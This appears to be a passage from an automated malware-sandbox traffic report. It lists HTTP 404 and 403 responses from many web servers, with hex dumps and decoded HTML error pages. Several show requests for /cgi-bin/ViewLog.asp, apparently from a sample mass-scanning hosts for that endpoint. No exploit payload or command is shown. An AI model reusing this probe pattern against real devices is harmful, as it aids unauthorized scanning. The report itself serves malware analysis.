Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 00:16:13 GMTConnection: Close
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: text/html; charset=utf-8Content-Length: 106Connection: closeData Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 07:21:23 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 03:16:22 GMTServer: webX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: application/jsonaccess-control-allow-origin: *content-length: 34date: Sat, 14 May 2022 00:16:26 GMTData Raw: 7b 22 63 6f 64 65 22 3a 34 30 34 2c 22 6d 65 73 73 61 67 65 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"code":404,"message":"Not Found"}
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Sat, 14 May 2022 00:16:34 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 03:11:38 GMTServer: webCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 00:16:46 GMTServer: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.2.34Content-Length: 217Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plain; charset=utf-8X-Content-Type-Options: nosniffDate: Sat, 14 May 2022 00:16:53 GMTContent-Length: 19Connection: closeData Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: 404 page not found
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 Forbidden
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 02:16:55 GMTServer: DNVRS-WebsCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: micro_httpdCache-Control: no-cacheDate: Sat, 14 May 2022 10:17:03 GMTContent-Type: text/htmlConnection: closeData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 63 72 6f 5f 68 74 74 70 64 2f 22 3e 6d 69 63 72 6f 5f 68 74 74 70 64 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>404 Not Found</H4>File not found.<HR><ADDRESS><A HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS></BODY></HTML>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 00:16:59 GMTServer: ApacheContent-Length: 279Connection: closeContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /cgi-bin/ViewLog.asp was not found on this server.</p><hr><address>Apache Server at 192.168.0.14 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: GlassFish Server Open Source Edition 4.0 Content-Language: Content-Type: text/htmlDate: Sat, 14 May 2022 00:16:57 GMTContent-Length: 1082Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 53 74 72 69 63 74 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 73 74 72 69 63 74 2e 64 74 64 22 3e 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 47 6c 61 73 73 46 69 73 68 20 53 65 72 76 65 72 20 4f 70 65 6e 20 53 6f 75 72 63 65 20 45 64 69 74 69 6f 6e 20 20 34 2e 30 20 20 2d 20 45 72 72 6f 72 20 72 65 70 6f 72 74 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 3c 21 2d 2d 48 31 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 32 32 70 78 3b 7d 20 48 32 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 3b 7d 20 48 33 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 7d 20 42 4f 44 59 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 7d 20 42 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 63 6f 6c 6f 72 3a 77 68 69 74 65 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 35 32 35 44 37 36 3b 7d 20 50 20 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 62 61 63 6b 67 72 6f 75 6e 64 3a 77 68 69 74 65 3b 63 6f 6c 6f 72 3a 62 6c 61 63 6b 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 7d 41 20 7b 63 6f 6c 6f 72 20 3a 20 62 6c 61 63 6b 3b 7d 48 52 20 7b 63 6f 6c 6f 72 20 3a 20 23 35 32 35 44 37 36 3b 7d 2d 2d 3e 3c 2f 73 74 79 6c 65 3e 20 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 3c 68 31 3e 48 54 54 50 20 53 74 61 74 75 73 20 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 68 72 2f 3e 3c 70 3e 3c 62 3e 74 79 70 65 3c 2f 62 3e 20 53 74 61 74 75 73 20 72 65 70 6f 72 74 3c 2f 70 3e 3c 70 3e 3c 62 3e 6d 65 73 73 61 67 65 3c 2f 62 3e 4e 6f 74
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Found
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 00:17:03 GMTServer: Apache/2.4.50 (Win64)Content-Length: 196Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 403 ForbiddenContent-Type: application/json;charset=utf-8Content-Length: 0Server: Jetty(9.1.z-SNAPSHOT)
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 00:17:09 GMTServer: Apache/2.4.38 (Debian)Content-Length: 274Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 33 38 20 28 44 65 62 69 61 6e 29 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache/2.4.38 (Debian) Server at 192.168.0.14 Port 80</address></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not Foundcontent-type: application/jsonaccess-control-allow-origin: *content-length: 34date: Sat, 14 May 2022 00:17:15 GMTData Raw: 7b 22 63 6f 64 65 22 3a 34 30 34 2c 22 6d 65 73 73 61 67 65 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"code":404,"message":"Not Found"}
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundAccess-Control-Allow-Origin: *Access-Control-Allow-Headers: Content-TypeContent-Type: text/htmlContent-Length: 345Date: Sat, 14 May 2022 00:17:13 GMTServer: WebServerData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 69 73 6f 2d 38 38 35 39 2d 31 22 3f 3e 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 20 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 3c 2f 68 65 61 64 3e 0a 20 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <?xml version="1.0" encoding="iso-8859-1"?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <title>404 - Not Found</title> </head> <body> <h1>404 - Not Found</h1> </body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sat, 14 May 2022 00:17:20 GMTContent-Type: text/htmlContent-Length: 162Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.8.1Date: Sat, 14 May 2022 00:17:21 GMTContent-Type: text/htmlContent-Length: 168Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 38 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.8.1</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundDate: Sat, 14 May 2022 03:23:19 GMTServer: WebsX-Frame-Options: SAMEORIGINCache-Control: no-cacheContent-Length: 166Content-Type: text/htmlConnection: keep-aliveKeep-Alive: timeout=60, max=99Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.16.1Date: Sat, 14 May 2022 00:40:01 GMTContent-Type: text/htmlContent-Length: 153Connection: keep-aliveKeep-Alive: timeout=60Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 36 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.16.1</center></body></html>
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: thttpd/2.25b 29dec2003Content-Type: text/html; charset=iso-8859-1Date: Sat, 14 May 2022 00:14:51 GMTLast-Modified: Sat, 14 May 2022 00:14:51 GMTAccept-Ranges: bytesConnection: closeCache-Control: no-cache,no-storeData Raw: 3c 48 54 4d 4c 3e 0a 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 20 54 45 58 54 3d 22 23 30 30 30 30 30 30 22 20 4c 49 4e 4b 3d 22 23 32 30 32 30 66 66 22 20 56 4c 49 4e 4b 3d 22 23 34 30 34 30 63 63 22 3e 0a 3c 48 32 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 32 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 27 2f 63 67 69 2d 62 69 6e 2f 56 69 65 77 4c 6f 67 2e 61 73 70 27 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 74 68 74 74 70 64 2f 22 3e 74 68 74 74 70 64 2f 32 2e 32 35 62 20 32 39 64 65 63 32 30 30 33 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 0a 3c 2f 48 54 4d 